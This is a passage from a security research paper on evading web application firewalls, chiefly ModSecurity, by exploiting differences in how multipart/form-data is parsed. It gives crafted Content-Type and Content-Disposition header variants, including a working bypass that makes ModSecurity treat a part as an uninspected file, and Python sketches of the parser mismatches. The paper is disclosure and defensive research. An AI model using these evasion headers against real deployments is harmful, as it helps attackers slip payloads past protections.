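    return mime_type.lower().startswith("multipart/")

mime = "multipart/"
print(passes_crs_check(mime))        # True: substring of the allow list
print(accepted_by_fileupload(mime))  # True: has the multipart/ prefix
```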

If you are a CRS user, you should upgrade to 2.2.5, which should address this problem.

Multipart Evasion
Multipart parsing has always been my favourite area of evasion. Not only is the specification
very shallow and ambiguous, but the multipart/form-data encoding is often overlooked, because
only sites that support file uploads need it. People tend to forget that even applications that
do not use file uploads can be forced into processing request bodies in multipart/form-data
format.

Multipart processing flow is as follows:

1. Recognize presence of multipart/form-data request body
2. Extract boundary
3. Process request body data
   a. Extract parts
   b. Determine part type
   c. Extract part name
   d. Extract part value
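The flow above can be sketched as a toy parser (deliberately simplified; a real implementation must also handle preambles, epilogues, quoting, and header edge cases):

```python
def parse_multipart(content_type, body):
    # Steps 1-2: recognize multipart/form-data and extract the boundary.
    mime, _, params = content_type.partition(";")
    if mime.strip().lower() != "multipart/form-data":
        return None
    boundary = None
    for param in params.split(";"):
        key, _, value = param.strip().partition("=")
        if key.lower() == "boundary":
            boundary = value.strip('"')
    if boundary is None:
        return None
    # Step 3a: extract parts.
    parts = {}
    for chunk in body.split("--" + boundary)[1:]:
        if chunk.startswith("--"):
            break  # final boundary marker
        headers, _, value = chunk.lstrip("\r\n").partition("\r\n\r\n")
        # Steps 3b-3d: part type and name come from Content-Disposition.
        name = None
        for header in headers.split("\r\n"):
            if header.lower().startswith("content-disposition:"):
                for param in header.split(";")[1:]:
                    key, _, pval = param.strip().partition("=")
                    if key == "name":
                        name = pval.strip('"')
        if name is not None:
            parts[name] = value.rstrip("\r\n")
    return parts

body = (
    "--0000\r\n"
    'Content-Disposition: form-data; name="a"\r\n'
    "\r\n"
    "hello\r\n"
    "--0000--\r\n"
)
print(parse_multipart("multipart/form-data; boundary=0000", body))
# {'a': 'hello'}
```

Every one of these steps is a decision point, and any disagreement between the WAF's version of a step and the backend's version is a potential evasion.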

Common programming mistakes

There are two ways in which you can discover what evasion techniques work. One is to read the
source code of the library or framework used by the target web site. This is the preferred
approach to use initially, because it will expose you to a number of common programming
mistakes and examples of corner-cutting.

There are several very common types of problems:

● Partial implementations, which cover only what is commonly used by major browsers,
but leave the edge cases unimplemented (e.g., HTTP request header folding)
● Lack of proper parsing, relying instead on crude substring matching or regular
expressions
● Not detecting invalid or ambiguous submissions
● Trying to recover from serious problems, in the name of interoperability
Let's now look at all processing steps, one at a time.

Content-Type evasion
As already discussed, the goal of this approach is to trick the WAF into treating a
multipart/form-data MIME type as something else, while the backend operates normally.
There are a number of approaches we can try here, for example:

Content-Type: multipart/form-data ; boundary=0000
Content-Type: mUltiPart/ForM-dATa; boundary=0000
Content-Type: multipart/form-datax; boundary=0000
Content-Type: multipart/form-data, boundary=0000
Content-Type: multipart/form-data boundary=0000
Content-Type: multipart/whatever; boundary=0000
Content-Type: multipart/; boundary=0000

The last example is what bypassed ModSecurity Core Rule Set.

Boundary evasion
The goal of this evasion technique is to get the backend application to use one value for the
boundary, while tricking the WAF into using another. Once that's possible, you can craft the
attack payload in such a way that it is processed correctly no matter which boundary value
is used. The end result is that the WAF misses the attack payload.

Examples:

Content-Type: multipart/form-data; boundary =0000; boundary=1111
Content-Type: multipart/form-data; boundary=0000; boundary=1111
Content-Type: multipart/form-data; boundary=0000; BOUNDARY=1111
Content-Type: multipart/form-data; BOUNDARY=1111; boundary=0000
Content-Type: multipart/form-data; boundary=ABCD
Content-Type: multipart/form-data; boundary=0000'1111
Content-Type: multipart/form-data; boundary="0000"
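As a hypothetical illustration of how the duplicate-parameter variants split two implementations, consider one parser that honors the first boundary parameter and another that lets a later duplicate win:

```python
import re

# Hypothetical extractors; real parsers vary, which is the whole point.
PATTERN = r'boundary\s*=\s*"?([^";,\s]+)'

def boundary_first(content_type):
    # Parser that takes the first boundary parameter it finds.
    matches = re.findall(PATTERN, content_type, re.I)
    return matches[0] if matches else None

def boundary_last(content_type):
    # Parser that lets a later duplicate override an earlier one.
    matches = re.findall(PATTERN, content_type, re.I)
    return matches[-1] if matches else None

ct = "multipart/form-data; boundary=0000; boundary=1111"
print(boundary_first(ct))  # 0000
print(boundary_last(ct))   # 1111
```

If the WAF ends up with one value and the backend with the other, a body crafted to parse validly under either boundary hides its payload from whichever view the WAF takes.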

Part evasion
The multipart format allows arbitrary data to appear before the first part, as well as after the last
part. In some cases this can be exploited. For example, PHP used to process all parts, even
those that appeared after the part marked as being last.

In 2009, Stefan Esser reported [7] that this problem could be used to bypass ModSecurity
running in front of a PHP application.
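A sketch of the difference, assuming a strict parser that stops at the final boundary and a lax one (modeled on the described historical PHP behavior, not its actual code) that keeps going:

```python
import re

def part_names(body, boundary, strict):
    names = []
    for chunk in body.split("--" + boundary)[1:]:
        if chunk.startswith("--"):
            if strict:
                break      # strict: the final boundary ends processing
            continue       # lax: skip the marker and keep going
        m = re.search(r'name="([^"]*)"', chunk)
        if m:
            names.append(m.group(1))
    return names

body = (
    "--0000\r\n"
    'Content-Disposition: form-data; name="a"\r\n\r\nbenign\r\n'
    "--0000--\r\n"  # final boundary; anything below should be ignored
    "--0000\r\n"
    'Content-Disposition: form-data; name="evil"\r\n\r\nPAYLOAD\r\n'
    "--0000--\r\n"
)
print(part_names(body, "0000", strict=True))   # ['a']
print(part_names(body, "0000", strict=False))  # ['a', 'evil']
```

A WAF that stops at the final boundary never inspects the part the lax backend goes on to process.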

Parameter name evasion

Each part in a multipart submission has a name. If you can get the WAF to use an incorrect
name, you succeed with evasion. The tricks here are similar to those used when attacking
boundary detection.

Content-Disposition: form-data; name="one"; name="two"
Content-Disposition: form-data; name="one"; name ="two"

For example, PHP will always use the last parameter value (two in the first example), but it's
also picky when it comes to parsing, and may "miss" a value that is not in exactly the format
it expects (this is why the name of the field is one in the second example).

ModSecurity will detect this attack because it does not allow multiple same-name parameters in
a Content-Disposition part header. Similarly, it does not allow unknown parameters to be used.
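A last-wins parser of this kind can be sketched in a couple of lines (modeled on the described PHP behavior, not its actual code):

```python
def cd_params(header_value):
    # Plain dict assignment: a later duplicate silently overwrites an
    # earlier one, so name="one"; name="two" yields name == "two".
    params = {}
    for param in header_value.split(";")[1:]:
        key, _, value = param.strip().partition("=")
        params[key] = value.strip('"')
    return params

print(cd_params('form-data; name="one"; name="two"'))  # {'name': 'two'}
```

A WAF that takes the first duplicate, or that rejects duplicates outright, will disagree with this parser, which is exactly the gap the evasion exploits.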

Parameter type evasion

There are two types of parameters. Normal parameters are equivalent to those in the
urlencoded format. File parameters are files. Some WAFs treat the contents of the files
differently. In ModSecurity, for example, the contents of the files are not inspected. So, if you
can trick ModSecurity into believing something is a file when it is not, you evade it.

This is what the C-D header of a file part looks like:

Content-Disposition: form-data; name="f"; filename="test.exe"

If the filename parameter is present, the part is considered to contain a file. If the filename
parameter is not present, the part is considered to contain a normal parameter.

There was already a bypass in this area, which Stefan Esser discovered [7] in 2009 (that was
after I had left the project, and I was not involved in the patching effort). It applied to a
deployment of ModSecurity protecting a PHP application. Stefan determined that PHP
supported single quotes for escaping in the C-D header, whereas ModSecurity supported only
double quotes. ModSecurity was subsequently patched to add support for single-quote
escaping, and all was well.

Earlier this year, when I started researching evasion, I decided to re-visit all historic evasion
issues and double-check them. The logic is simple: where you discover one unusual behavior
you may discover another. After reading the PHP source code, I understood that the original
vulnerability was not in the code that parses key-value pairs, but in the code that executes
before that, and which breaks the C-D value into key-value pairs.

Content-Disposition: form-data; name=1"2;3"4; filename=5

In the example the double quotes (single quotes can be used too) are effectively shielding the
semicolon, which is the termination character for a key-value pair. So, as far as PHP is
concerned, the semicolon is data. For everyone else, it's part of the C-D syntax.
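A quote-aware splitter of this kind, sketched in Python against a naive split on semicolons (an illustration of the described behavior, not PHP's actual code):

```python
def split_kv_quote_aware(value):
    # Quotes may open anywhere inside a token; while one is open, ';'
    # is treated as data rather than as a pair separator.
    pairs, buf, quote = [], "", None
    for ch in value:
        if quote is not None:
            buf += ch
            if ch == quote:
                quote = None
        elif ch in "'\"":
            buf += ch
            quote = ch
        elif ch == ";":
            pairs.append(buf.strip())
            buf = ""
        else:
            buf += ch
    pairs.append(buf.strip())
    return pairs

header = 'form-data; name=1"2;3"4; filename=5'
print(split_kv_quote_aware(header))
# ['form-data', 'name=1"2;3"4', 'filename=5']
print([p.strip() for p in header.split(";")])
# ['form-data', 'name=1"2', '3"4', 'filename=5']
```

The two outputs show the disagreement: the quote-aware splitter keeps the shielded semicolon as data, while a naive splitter produces an extra, bogus token.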

Once you understand the core issue, it's clear that ModSecurity's patch was insufficient. All you
need to exploit the problem is to add a single non-quote character as the first character in the
parameter value. Like this:

Content-Disposition: form-data; name=x';filename="';name=userid"

PHP allows you to use quote characters anywhere on the line, but ModSecurity's parser is quite
strict, so the only place where the exploit can be used is in the parameter value.

Once the evasion payload is removed, this is what PHP sees:

name = userid

Although there are two name parameters, the first one is overwritten by the second one.

On the other hand, ModSecurity sees this:

name = x'
filename = ';name=userid

The evasion messes up the parameter names as observed by ModSecurity. That alone can
interfere with any virtual patches that may be deployed. More importantly, the part is treated as
a file and bypasses all inspection.

Acknowledgements
Thanks to Johannes Dahse, Mario Heiderich, Krzysztof Kotowicz, Marc Stern, and Josh Zlatin
for providing feedback to the draft versions of this paper.
References
1. PCI Data Security Standard (PCI DSS): Application Reviews and Web Application
Firewalls Clarified (2008)
2. ModSecurity and ModSecurity Core Rule Set Bypasses, by Ivan Ristic (2012)
3. External Web Application Protection: Impedance Mismatch, by Ivan Ristic (2005)
4. IronBee WAF Research on GitHub
5. ModSecurity Reference Manual, Transformation functions
6. HTTP Parameter Pollution, by Luca Carettoni and Stefano di Paola (2009)
7. Shocking News in PHP Exploitation, by Stefan Esser (2009)
8. PHP Peculiarities for ModSecurity Users, by Ivan Ristic (2007)
9. ModSecurity open source web application firewall
10. ModSecurity Core Rule Set
11. Apache Commons FileUpload
